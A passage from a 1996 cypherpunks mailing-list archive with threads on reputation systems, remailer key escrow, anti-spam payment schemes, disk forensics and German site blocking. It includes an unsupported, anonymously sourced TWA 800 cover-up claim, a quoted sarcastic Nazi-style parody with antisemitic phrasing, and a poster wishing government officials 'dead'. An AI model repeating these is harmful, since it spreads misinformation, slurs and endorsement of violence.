is still on the scene.

The FBI has conducted at least 3,000 eyewitness interviews and the
NTSB has not been able to be a part of these interviews not have
any access to the contents of them.  Some of those eyewitnesses
reported seeing lights.  Those were probably the landing lights of
the USAir plane.

It has been a cover-up from the word go.  The NTSB is there in name
ONLY.  All announcements made by Mr. Bob Francis say absolutely
nothing and notice that the FBI is always standing beside or behind
Mr. Francis and it would appear that his job is to make sure that
nothing is said that would give away "THE BIG SECRET!"

It is time to end this farce and tell the public the real truth as
to what happened to TWA 800.

My source shall remain my own but the above information is true
and I believe it will all become known soon.  Now that all of you
know the real truth.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Sat, 7 Sep 1996 05:39:54 +0800
To: kadafi@netcom.com>
Subject: RE: Anonymous phone calls (was: What is the EFF doing exactl
Message-ID: <9608068420.AA842043614@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Audit trails may now be in place, in which case the cost of anonymity is
increased to the cost of the lowest denomination card. Think OTP.

However, in both Britian and France I have seen defective phones that allowed LD
calls but did not deduct the call amount from the card. Obviously, the effect
was free LD and these phones were perpetually busy.

If audit trails were in place, this problem should have been noticed quickly.

As I said, things may have changed for newer systems.

James

----------
From:   Flying insect killer <kadafi@netcom.com>
Sent:   Friday, September 06, 1996 1:20 PM
To:     jimbell@pacifier.com
Cc:     James Bugden; pstira@escape.com; cypherpunks@toad.com
Subject:        Re: Anonymous phone calls (was: What is the EFF doing exactl


On Fri, 6 Sep 1996, jim bell wrote:

> At 10:08 AM 9/6/96 EST, jbugden@smtplink.alis.ca wrote:
> >There is another spin possible on the reasons for replacement of pay phones
with
> >credit card phones. In Canada all new credit card phones are also able to
take
> >phone cards (which are anonymous).
> 
> Don't be too sure about the "anonymity" of these cards.  You don't have to 
> give your name when you buy or use them, but assuming a large number of 
> phone calls (to, from different locations) can be associated together after 
> the fact, your name can probably be fairly easily obtained.
> Jim Bell
> jimbell@pacifier.com

And phone companys that offers phone cards keep track of every call that 
goes thru each card number. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Sat, 7 Sep 1996 08:36:50 +0800
To: cypherpunks@toad.com
Subject: Re: Reputations
Message-ID: <9609062100.AA29557@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM> I strongly disagree. It's quite possible for Person A to quickly convert
TCM> his reputation to Person B to a _negative_ value. Real quick, in fact.

GB>I don't see how there can be such a thing as negative reputation
GB>capital. Wouldn't that mean B believes the opposite of what A says?

B wouldn't necessarily believe the _opposite_, but if R(A,B) is negative,
then B would treat whatever A says with greater skepticism.  ("Consider
the source.")

Alternatively, R(A,B) << 0 might mean that B has decided that A's posts
tend not to be worth even the time it takes to read them, and has set
his killfile accordingly.  (Think of someone who makes unsupported
assertions: this is not a reason to believe the _opposite_ of what he
says, but to ignore him.)


GA>If you anti-believed someone in a consistent manner, couldn't they exploit
GA>that?

Sure; see any number of Cold War spy novels for examples.


One point that I think deserves mention, but that I haven't seen yet in
this thread, is that R(A,B) is contextual; it should be R(A,B,subject).
To accept the word of an authority outside his area of expertise is a
common logical fallacy.  (Think of political endorsements by famous actors.)

Conversely, so is dismissing something just because its proponent has a
negative reputation in another context.  (At the risk of flirting with
Godwin's law, an example might be that just because a certain well-known
evil person liked Karl May novels and music by Wagner, this does not in
itself make these things bad.)


GB>For instance, when a certain infamously-low-reputation (deservedly so)
GB>individual recently joined the cypherpunk lists, others who had endured
GB>him in the past tried to relay their impressions of him. It proved very
GB>difficult to convey, and they were somewhat attacked for their efforts
GB>and not entirely believed.
GB>
GB>In other words, he *could not* spend down to 0, despite years of
GB>unflagging effort.

I'd interpret this situation a bit differently.  In the eyes of many
list members, this individual _did_ spend down to 0 -- and below, I'd
argue, based on the number of people who announced changes to their
killfiles.  But this was because of his actions on the list; it was
_not_ because of the impressions of others.  Most of the regulars on
this list are, IMHO, logical enough thinkers, and of sufficiently
independent mind (to put it mildly), to wait and see for themselves.
Results in other, more conformist or authoritarian groups may vary...

In other words, it would appear that "reputation capital" is difficult
to create or destroy based only on the word of others; it has to be earned.
(Hmm, is it easier to destroy than to create -- are we more likely to
adjust our R(A,me) score downward based on what others say about A?)


TCM?> But
TCM?> what if the American Heart Association publishes a detailed study on the
TCM?> fat levels of MacDonald's products and declares it to "Dangerous." The
TCM?> effect will probably be greater, as R (AHA, many people) = high, and by the
TCM?> kind of Dempster-Shafer belief calculus I discussed a few months ago, the
TCM?> rep of the AHA propagates semi-transitively to the rep of MacDonald's.
TCM?>
TCM?> (This all happened recently, with the famous studies of fat levels of movie
TCM?> theater food...sales dropped almost overnight, and now the fat levels of
TCM?> popcorn, etc., have been changed for the better.)

I agree with the first paragraph; however, I'm not sure that the second
paragraph gives an example of this.  The high levels of saturated fats
in movie popcorn were (as I recall) publicized by the previously little-
known "Center for Science in the Public Interest", a group with nowhere
near the reputation capital of the AHA.  Their claims were taken seriously,
not because the group itself was particularly reputable, but because the
results were dramatic and easily verified.   A better example might be
that of Surgeon-General Koop vs. the tobacco companies.


GB>I've already made the points I wanted to make, so I may not have further
GB>comments.

TCM>Nor me.

Well, I've probably said enough, then, especially considering that no
one is paying attention any longer.  Wouldn't want excess verbiage to
lower what little reputation capital I may have here...  :-)

--
Martin Janzen           janzen@idacom.hp.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 7 Sep 1996 14:49:54 +0800
To: cypherpunks@toad.com
Subject: Re: What the NSA is patenting
Message-ID: <ae56437706021004a769@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:50 AM 9/7/96, Jean-Francois Avon wrote:
>A maybe usefull program would be a little tsr that constantly
>overwrite unused sectors of the entire drive with random patterns
>(maybe seeded with a fast keyboard interval timer).  Like at the very
>moment I am writing this, my HD has been idle for several minutes...
>


The NSA STM method is related to reading _very subtle_ variations in
magnetic domain modifications. Jitter in read-write head positions can be
thought of as a noise (N) added to some signal (S)l. Extraction of signals
in low S/N ration environments is a well-developed science.

Not to start another round of "thermite bomb" posts, but I would not trust
n-pass erasures.

Of course, this is about the least of my concerns. If the Feds are planning
to use STM probes on your seized drives, you've got more serious problems.

(The oft-discussed possibility of more secure dongles, or secret decoder
rings. is still off in the future. Most of us just enter our various
passwords, and our local disk drives reveal all.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Sat, 7 Sep 1996 07:39:15 +0800
To: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Subject: Re: Conservation Laws, Money, Engines, and Ontology (fwd)
In-Reply-To: <Pine.SUN.3.91.960906014039.21664B-100000@cybercash.com>
Message-ID: <9609061904.AA00879@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Donald Eastlake writes:
>  I don't think any one step will solve all our spam problems
>  but I wouldn't mind spending, say, 5 cents for each real piece
>  of mail I sent outside my company and if end machines charged
>  5 cents per piece of ouside mail received, I think spamming
>  would be crippled.  (Note that with bad guy lists, you could
>  collect the money and then just throw away the mail.)

So would you be willing to pay $50.00 for this message you sent to  
cypherpunks?  If there are a thousand recipients and each one charges $0.05  
for the priveledge of you sending it e-mail....  It seems like such a scheme  
would not only cripple spam, but public discussion lists like this one.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 8 Sep 1996 01:46:16 +0800
To: cypherpunks@toad.com
Subject: Re: Metcalf and Other Net.Fogies
In-Reply-To: <ae545aa807021004884d@[207.167.93.63]>
Message-ID: <v03007823ae5641e72fd5@[17.203.21.75]>
MIME-Version: 1.0
Content-Type: text/plain


I think it was one of Clarke's numerous laws:

"If an old scientist says it can't be done and a young scientist says it
can, believe the young scientist."

I think the contrapositive also holds...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 7 Sep 1996 08:41:39 +0800
To: peter.allan@aeat.co.uk
Subject: Re: Job for netescrow ? (was Secure anonymouse server protocol...
In-Reply-To: <9609051155.AA14504@clare.risley.aeat.co.uk>
Message-ID: <199609061322.OAA01150@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Peter Allan <peter.allan@aeat.co.uk> writes on cpunks:
> In the talk about replyable nym-mailers I haven't
> yet seen netescrow mentioned.
> 
> You DID all read this ?
> 
> [Matt Blazes  Oblivious Key Escrow paper]
>
> This all hinges on a policy to be followed by archive holders defining
> the conditions under which they release their shares.  
> This could be receipt of a signed request from the owner (remailer).
> 
> Maybe the table relating nyms to reply addresses could be stored in
> netescrow style so that captured remailers reveal nothing.  The problem
> of operator coercion is not addressed by this.

Just to clarify, if I understand correctly you are proposing a penet
style system with the database held in `netescrow'.

The remailer in normal operation has access to the database by making
requests satisfying the conditions of the secret share holders.

When the remailer is compromised the memory resident key is lost when
the machine is switched off, and the owner refuses to release the key.

Is what you are proposing?

It sounds like a cross between Matt's netescrow and Ross Anderson's
eternity file system.  Your penet database is being stored in a
distributed file system, with shares, and the identity of the share
holders is concealed.  However the aim is not to prevent others
censoring your publically available writings, but to allow a second
avenue of access only in the case of `mob cryptography'.

This changes the system over storing the database encrypted on the
remailer machines own disk in these ways:

1.  When the police shut down the remailer and ask the
    operator to hand over the key he can decline, but they
    can (theoretically) get the database from the netescrow,
    if they can convince enough share holders.

    If the police are unsucessful (seems likely) does this offer the
    operator much solice in his jail time for contempt of court, to
    know that he has a vote of confidence in the moral correctness of
    his decision from a population of the net?

    Does it offer him any legal benefit?  Are the share holders guilty
    of contempt also, does this lessen his guilt, and harshness of
    prosecution?  (Remember that the share holders identity and
    location are unkown to the operator, in the netescrow model, if I
    remeber rightly).

    I'm not sure how useful this part is, unless the possibility of
    `mob cryptography' is the desired feature.  I'd have thought an
    individual remailer operator would be more likely to fold than a
    group of anonymous crypto-anarchists.

2.  You could add the twist of an alternative duress key, that would
    stand a real chance of successfully nuking the database.  More
    satisfying.

> Police investigations might apply "angry mob cryptanalysis" to find
> a sender - convincing a sizable number of operators that a crime had
> been committed with some particular piece of traffic.

3.  Negative comment on the system: TLAs have a vested interest in
    themselves being most of the share holders.  True of the ownership
    of the current remailers also of course.

Is the aim of allowing `mob cryptography' the desired feature?

If so this is NAK, `Net Access to Keys'.

Fine by me, as long as it's strongly voluntary :-)  (And hence useless
for it's forced access purposes).

NAK, is interesting in that it puts things to a vote, where the
parties are anonymous, they are on the net, so it's a Net
constitutency that gets to vote.  It seems less evil than GAK.

However I still have problems with it:

problem 1: subterfuge by TLAs, they'll try to become share holders in
a big way, and preventing them from doing this seems difficult without
Chaumian style is-a-person credentials, to prevent multiple voting.
Even with is-a-person TLAs would then target the credential issuer.
(Much the same as the TLAs are able to create fake credit histories,
identities, and so on currently).  Unless there is a way to do a
decentralised web of trust implementation of an `is a person'
credential in such a way that it is difficult for TLAs to target.

Perhaps it would be simpler to require a certain amount of ecash be
paid as a vote, set it high enough that no one can afford to abuse it,
TLAs included.

problem 2: free speech is free speech even if it's unpopular.  The
tyranny of the majority problem.  Non-voluntary NAK forces peer review
on every one, and just because some peoples views rate badly in a lot
of peoples eyes, doesn't mean they should be punished.

Perhaps this problem can be mitigated by constructing the shares such
that 99% of `is a person' checked votes certifying that they believe
they have evidence that the nym in question is in the throws of nuking
a major city for a ransom.

So what do cpunks think of Matt's `Oblivious Key Escrow', formulated
as NAK coupled with either is-a-person, or pay per vote to eliminate
the multiple voter problem.

It would force accountability and openess on our spooks, they have to
explain, document clearly, or at least present some real convincing
arguments.

At the same time it would provide an argument against GAK, all
legitimate (in the publics eyes, what other opinions count, this is a
democracy isn't it) law enforcement needs met.

However these advantages are balanced against the tyranny of the
majority problem, which is better than tyranny by unaccountable TLAs,
but still a problem,

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Sat, 7 Sep 1996 09:32:47 +0800
To: cypherpunks@toad.com
Subject: Re: Reputations
Message-ID: <v02140b00ae565008c611@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


gregburk@netcom.com (Greg Burk) writes:
> mccoy@communities.com (Jim McCoy) writes:
> > Greg Burk writes:
[...]
> > Go read Ender's Game by Orson Scott Card (a good book to read anyway :)
> > and examine the nature of the computer network "discussion groups" he talks
> > about: a classic example of reputation markets in many-to-many discussions.
[...]
> I have read it, a long time ago. Frankly, it's a spectacularly bad
> example. He writes of the two child-protagonists gaining reputations as
> great philosophers on a sort of Usenet. (At the time I believe OSC was a
> member of Delphi, UNCLEORSON)
>
> Look around on the real Usenet. OSC could not have been more wrong.

If you look closer you would probably be surprised to see things starting to
move in this direction.  As the number of participants has grown the "noise"
in most newsgroups has grown to an unmanageable level.  Now most newsreaders
allow you to score authors or article threads so that you can keep individual
reputation and interest files.  I am actually an anomoly at my company, a
collection of very net-savvy people, because I actually still participate in
a few newsgroups; most of the interesting net discussions now take place on
mailing lists which allow further reputation filtering (most mail agents have
better and more flexible filters than news agents) and most bleeding-edge
traffic happens in private mailing lists where one cannot even participate
unless they have already established their reputation.  If these lists were
gatewayed to read-only newsgroups you would have what Card was talking about.

> > > As an "asset", it is extremely non-liquid:
> > >
> > > How exactly would you "convert" your reputation into other capital?
> > > Would you accept bribes and tell lies? Seems to me you would only get a
> > > one-shot "conversion" and it couldn't possibly hope to equal your
> > > investment.
> >
> > Tell that to Walter Cronkite, Siskel & Ebert, Moody's and others who have
> > converted reputation capital into large piles of money [...]
>
> You don't seem to realize you are actually including at least one major
> example of a counterfeit reputation here.
>
> I speak of Siskel & Ebert, whom I have caught at least once giving a
> strikingly dishonest review. I had seen the movie (See You In The
> Morning) on opening day, before they reviewed it. It stunk.

No, this is just an example of how reputations are not global values, each
reputation is modified by the perspective of the user.  _You_ disagreed
with the review and have probably used your experience to weight the
values of future reviews by those particular reviewers.  This is why there
are hundreds of different sources of reviews for movies, people weight the
recommendation given by the reviewer with

> Conclusion: They knew it stunk, but for some reason I won't speculate on
> they wanted to say they liked it so they misreported it, and covered
> their butts with a review that would look mixed later but sound like a
> rave now. I see a counterfeit reputation.

Incorrect.  One thought it was a good film and the other disagreed.  You
did not find it to be a good film and have since modified your weighting
of the Siskel & Ebert reputation value to reflect this.  It is highly
improbable that there were any behind-the-scenes machinations between the
movie backers
and the reviewers: such a person has a value which is directly proportional to
being viewed as impartial and once they have established a reputation the
value in maintaining the reputation outweighs the value a potential briber
could gain by trying to influence the review (nothing will drop the
reputation faster than getting caught cheating, and a single reviewer does
not have enough influence on the public to impact a films box office returns
enough to make the bribe worthwhile.)  It is more likely that you just
disagreed with the review and
you have since learned your lesson and now seek multiple review sources or
else switched to a different source for movie review information (dropping
your personal weighting of Siskel & Ebert down below other sources.)

> > No, I think that you just don't understand the mechanics of reputations and
> > how they interact with the most important resource in most people's lives:
> > time.
>
> I'm tempted to tit-for-tat, but I will not refute your points by telling
> you you just don't understand.

I guess I could have been more diplomatic, but it seems that you just do not
understand that reputations are not a global value, rather they are a
weighted value which is modified over time as the user seeks to determine a
balance of raters and reviewers which most closely represents their
particular viewpoints, interests, and experiences.  There is no one single
reputation which a given person has, all reputations are dependant upon the
source of the reputation and the context in which that particular reputation
is used.

> > time.  Instead of thinking of "reputation" look at it from the other end and
> > consider the "attention marketplace."
>
> Fine, but resolving good vs counterfeit reputations takes time too.

*Sigh*  There is no such thing as a "counterfeit" reputation.  When someone
joins a network with a particular set of interests they will start off by
finding a reputation service(s) which they think, though various channels
ranging from advertisement to word of mouth, closely matches their interests
and views.  This is the only time that outright deception can influence a
person and it is also the point at which deception is least profitable
(because the deceiver will be easily revealed once the user compares the
reputations with what they expect to see and because most new users will
choose multiple services to perform comparison shopping.)  There may even be
reputation services which rate other reputation services to let people know
how the service compares to its stated viewpoints and advertisements.  A
reputation service gains income by establishing a long-term replationship
with the customer, so it is in the services interests to maintain credibility
with its users.  If they do not then that reputation service will have a
negative weighting depending on what the user is interested in, so the
problem of correct vs. incorrect reputations will itself be handled by
reputation services.

An individual will have multiple reputations depending on which service is
providing the reputation and the context in which the reputation is being
used.  "Tim May" may have a relatively high reputation in most services on
cryptography and crypto-anarchy issues but this reputation will not apply to
football predictions or articles posted to soc.culture.swedish.  Someone may
try to burn a reputation to pass off a false statement as truth, but this is
as unlikely to work as it is for Peter Jennings to tell all of his viewers
that this afternoon Bill Clinton appointed me his senior domestic policy
advisor; people now have a wide variety of news and information sources to
use for comparing the veracity of the statement, getting caught diminishes
his reputation and this has a monetary value to him, and because his audience
is larger due to his increased reputation there is a greater chance that
others will investigate the matter and so his chance of getting caught is
higher.

> > Right now reputation markets have a
> > limited presence on the internet (mostly through killfiles) because the
> > tools required are not integreated into the tools used to browse the
> > information. In time this will change.
>
> How? I ask for something more specific than In The Future Everything
> Will Be Done Right.

Version 0.1 (coming to a news server near you by the end of the year) will
take the form of a service whereby you can subscribe to a usenet filtering
service which will present your newsreader with a database of articles which
have already been filtered by the reputation service to remove off-topic and
"me too" posts (or perhaps based upon other filtering criteria.)  The agency
making this service possible will also sell to individuals or groups the
ability to start their own service on this news host and perform whatever
filtering they want, this will also include adaptive filters (if I can ever
get the little bastards to use an internal weighting function which does not
converge too quickly) which will attempt to learn the general weighting
criteria are so that the people running reputation filtering need only update
the filters occasionally and not score each and every posting.

The hard part, and the part which is slowly gaining enough momentum to make
this possible, is the integration of cryptographic signatures into messages
so that one can determine the authenticity of a message and thereby assign
a reputation value to a real identity instead of an easily forgeable email
address.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 7 Sep 1996 07:24:29 +0800
To: Jüri Kaljundi <.cypherpunks@toad.com
Subject: Re: electronic offshore banking
Message-ID: <2.2.32.19960906192055.008a61e0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:25 PM 9/6/96 +0300, Jüri Kaljundi wrote:
>
>Are there any good offshore banks that would allow you to use your account
>over the Internet?
>
>I know European Union Bank www.eub.com is on of those available, but their
>US$ 25.000 minimum deposit is too stupid.
>
>Jüri Kaljundi
>AS Stallion
>jk@stallion.ee
>
>

Does Compuserve count as the Internet?  It soon will be the Internet since
they are dropping their proprietary software.  TSB (including TSB's Jersey
subsidiary) has a new net-based banking arrangement using Compuserve.  See
the TSB web site http://www.tsb.co.uk/pcbank.htm or Compuserve (GO TSB).
TSB in Jersey (or predecessor institutions) has been there since the 1820s
or so.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Sat, 7 Sep 1996 07:18:25 +0800
To: SCN User <bf578@scn.org>
Subject: Re: Conservation Laws, Money, Engines, and Ontology (fwd)
In-Reply-To: <199609061745.KAA09285@scn.org>
Message-ID: <Pine.SUN.3.91.960906150349.1634A-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


Of course, as you say, security needs to be improved also.  See 
draft-eastlake-muse-00.txt in the IETF shadow directories.

Donald

On Fri, 6 Sep 1996, SCN User wrote:

> Date: Fri, 6 Sep 1996 10:45:57 -0700 (PDT)
> From: SCN User <bf578@scn.org>
> To: dee@cybercash.com
> Subject: Re: Conservation Laws, Money, Engines, and Ontology (fwd)
> 
> >
> >Suggest you look at draft-eastlake-internet-payment-*.txt in the
> >IETF shadow directories.  I don't think any one step will solve all
> >our spam problems but I wouldn't mind spending, say, 5 cents for each 
> >real piece of mail I sent outside my company and if end machines charged 
> 
> >5 cents per piece of ouside mail received, I think spamming would be 
> >crippled.  (Note that with bad guy lists, you could collect the money and 
> >then just throw away the mail.)
>    Why should I pay for mail I can't control?
> 
>   Before charges like this can be implemented, protocols/security/etc
>   need to be improved to accurately indentify the sender.
> 
> 
> --
> ------------------------------------------
> There are no facts, only interpretations.
> I always wanted to be somebody, but I should have been more specific.
> Food for thought is no substitute for the real thing.
> 

=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)
http://www.cybercash.com           http://www.eff.org/blueribbon.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Sat, 7 Sep 1996 07:27:39 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Conservation Laws, Money, Engines, and Ontology (fwd)
In-Reply-To: <9609061904.AA00879@ch1d157nwk>
Message-ID: <Pine.SUN.3.91.960906150824.1634C-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


No, I wouldn't be willing to pay $50.00 to have sent that message to
cypherpunks.  But I would certainly have been willing to pay some smaller
non-zero amount, like a dollar (and then there is the question of the
entities I blind copied it to ...).  But I never claimed that charging was
the answer to everying or compatible with the cypherpunks anarchy.  It just
seems like a useful tool to have available.  Based on (hopefully secure)
message characteristics, you want to encourage some mail and probably give it
extra priority, other mail you might want to charge a penny or two for, and
known junk sources you want to charge as much as you can and then trash the
mail.  Probably remailers should sign messages so you can easily configure to
let their mail in if you want to get it.  But there should still be 
appropriate social and legal action against network abusers as well. 

Donald

 On Fri, 6 Sep 1996, Andrew Loewenstern wrote:

> Date: Fri, 6 Sep 96 14:04:51 -0500
> From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
> To: "Donald E. Eastlake 3rd" <dee@cybercash.com>
> Cc: cypherpunks@toad.com
> Subject: Re: Conservation Laws, Money, Engines, and Ontology (fwd)
> 
> Donald Eastlake writes:
> >  I don't think any one step will solve all our spam problems
> >  but I wouldn't mind spending, say, 5 cents for each real piece
> >  of mail I sent outside my company and if end machines charged
> >  5 cents per piece of ouside mail received, I think spamming
> >  would be crippled.  (Note that with bad guy lists, you could
> >  collect the money and then just throw away the mail.)
> 
> So would you be willing to pay $50.00 for this message you sent to  
> cypherpunks?  If there are a thousand recipients and each one charges $0.05  
> for the priveledge of you sending it e-mail....  It seems like such a scheme  
> would not only cripple spam, but public discussion lists like this one.
> 
> 
> andrew
> 

=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)
http://www.cybercash.com           http://www.eff.org/blueribbon.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D. Moeller" <moe-san@stadt.com>
Date: Sat, 7 Sep 1996 02:38:00 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: ... subversive leftists
In-Reply-To: <ae544a4003021004ad89@[207.167.93.63]>
Message-ID: <32302DD6.43D3@stadt.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 11:23 AM 9/5/96, Asgaard wrote:

> Leftists are despicable. They steal our money, they corrupt our politics,
> they nationalized our industries, they subvert our ideals, and they
> undermine our national will.
> The Democratic People's German Reich is fully justified in cutting off
> contacts with subversive radical publications in Jew-dominated nations like
> Holland.
> As Reichskommander Schmidt points out: "The citizen-units who access
> foreign Web sites will be rounded up and disposed of like the vermin they
> are. We cannot allow the Revisionists and Leftists to triumph. We will send
> them to the showers."
> Heil Freeh!
> --Klaus

OK, I take the above as a sarcastic one.

I took a longer view at the "to be blocked"-sites and to the
declearation
of the prosecutor. 

After all, I found the following facts: 
1.) The mentioned URLs DO contain material, which is <free translation>
"description and tolerating/praising of a terroristic act", describing
the 
sabotage of a public railroad-line by using means of inflammables and 
reprogramming railroad-signs. They also used some
"explosive-warning"-signs 
in order to simulate a possible positioned bomb.

2.) The aforementioned IS a felony according to ruling german law.

3.) It is NOT depending if these articles are Leftist's, Rightist's or
else. According to Germand Law, the Attorney General is in charge for 
ANY extremistic/terroristic contents of pamphlets, books, or any other
source of information. 

4.) As you might know, we had a very bad time dealing with 
Leftist-Terrorists some 10-20 years ago. Therefore I can understand, 
that there exists a certain "oversensibility" dealing with any form
of public terror.  

5.) The "advice", given to the german ISPs, is IMO a very poor try to
transfer ruling law to the "new medium", which is, as we all know and
still try to improve, beyond control of governmental agencies.
As soon as our stupid politicians will be aware of what the net really
is (which should take 2-4 years) they will understand also, that 
pressing ISPs to blocking sites is no way of dealing with the problem.

6.) I personally think, that every individual has the right to gain 
access to every source of information, in order to build a opinion
on their own.

7.) CUT THAT SHOWER SHIT! I can't take it anymore - all the time
through school and now I'm grown up and still have to deal with this 
shit, even by Herr May ;-).

That's what I think - come and beat me up ;-)

Cheers Moe!
-- 

D. Moeller at WebLab U-Agency GmbH   
webadmin@stadt.com  http://www.stadt.com/u-agency/ 
moe-san@elcafe.com  http://www.elcafe.com/~moe-san/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 7 Sep 1996 09:57:55 +0800
To: Dale Thorn <cypherpunks@toad.com
Subject: Re: Doing away with govt. people
Message-ID: <199609062301.QAA18475@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:13 PM 9/6/96 -0700, Dale Thorn wrote:
>Gee, if we could just prosecute "the govt." under auspices of the
>"three strikes" legislation:
>
>Gehlen Deal                   MK/ULTRA
>"That 'Bay of Pigs' thing"    ZR/RIFLE
>Watergate                     MH/CHAOS
>Iran/Contra                   Phoenix Program
>BCCI/BNL                      COINTELPRO
>INSLAW                        Waco, etc.


You've probably heard of the "RICO statute," or "Racketeer-Influenced and 
Corrupt Organizations" law.  It's both criminal and civil:  You're supposed 
to be able to bring a RICO lawsuit against an organization and get triple 
damages.  Maybe somebody should try it and name the federal government as 
defendant...There's certainly plenty of evidence.


>Just say "Three strikes and you're (what?)"

"Dead,"  preferably.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Sat, 7 Sep 1996 10:49:41 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Court challenge to AOL junk-mail blocks
Message-ID: <199609062352.QAA20226@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About:  6 Sep 96 at 18:04, E. Allen Smith wrote:

> list-managers list, a consent arrangement would thus be preferable. The
> other argument of the Cyber Promotions jerks is nonsense - how does AOL
> blocking affect the rest of the Internet?

It's affecting the rights of these fine spammers, Cyber Promotions.  
That affects spammers everywhere.  More rules by our government 
affects all of us.

> >PHILADELPHIA, Pa. (Sep 6, 1996 12:23 p.m. EDT) -- A federal judge has =
<<<<SNIP>>>>>
> >"We feel that America Online has violated the civil rights of their =
> >members and has violated our rights to send e-mail through the Internet, =
> >which AOL does not own," he said.
> 
> >Although unsolicited mail sent through the post office in the United =
> >States is not considered illegal, the rules have yet to be defined in =
> >cyberspace. 

That's the real point I have always made.  No rules and we should
not want rules.  Why are we INVITING the government into OUR
internet??? Just cause we have to read spam?  That is just plain
stupid!!!  Just cause we have to read spam, oh well, let the
government come on in. Do we let the government into our bedrooms
because our wife says no to sex tonight or because we don't like to
make our beds??  Everyone on this list seems to want to limit
government  intervention EXCEPT when it comes to spam, then every
one just holds the door open wide and let them in.  If they get that
inch, they WILL take the whole 9 YARDS!!!!!!  Get a clue, delete or
killfile those who spam and keep the government out of
cyberspace!!!!!!


By the way, I get about 2 or 3 spams a day in my mailbox and it is 
not killing me!  Don't get the wrong idea, I don't like it.  I like 
the government WAY LESS!!!!! 

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Sat, 7 Sep 1996 08:37:05 +0800
To: cypherpunks@toad.com
Subject: Global Alert -- Hysteria in the U.K. threatens Net
Message-ID: <v0151010dae56517ee79a@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


[For more details and background, check out
http://www.eff.org/~declan/global/ and
http://www.hotwired.com/netizen/96/36/index4a.html for my U.K. cyberporn
fearstorm piece. --Declan]



September 6, 1996

                        *** GLOBAL ACTION ALERT ***

FOR IMMEDIATE RELEASE

-  Please redistribute this document widely
   with this banner intact
-  Redistribute only in appropriate places
   & only until 30 September 1996

Global Alert: Hysteria in the UK Threatens Free Speech on the Net

The Sunday, August 25 issue of the London Observer splashed across its
front page a sensationalized account of child pornography on the Internet,
falsely accusing two Internet Service Providers, Clive Feather of Demon UK
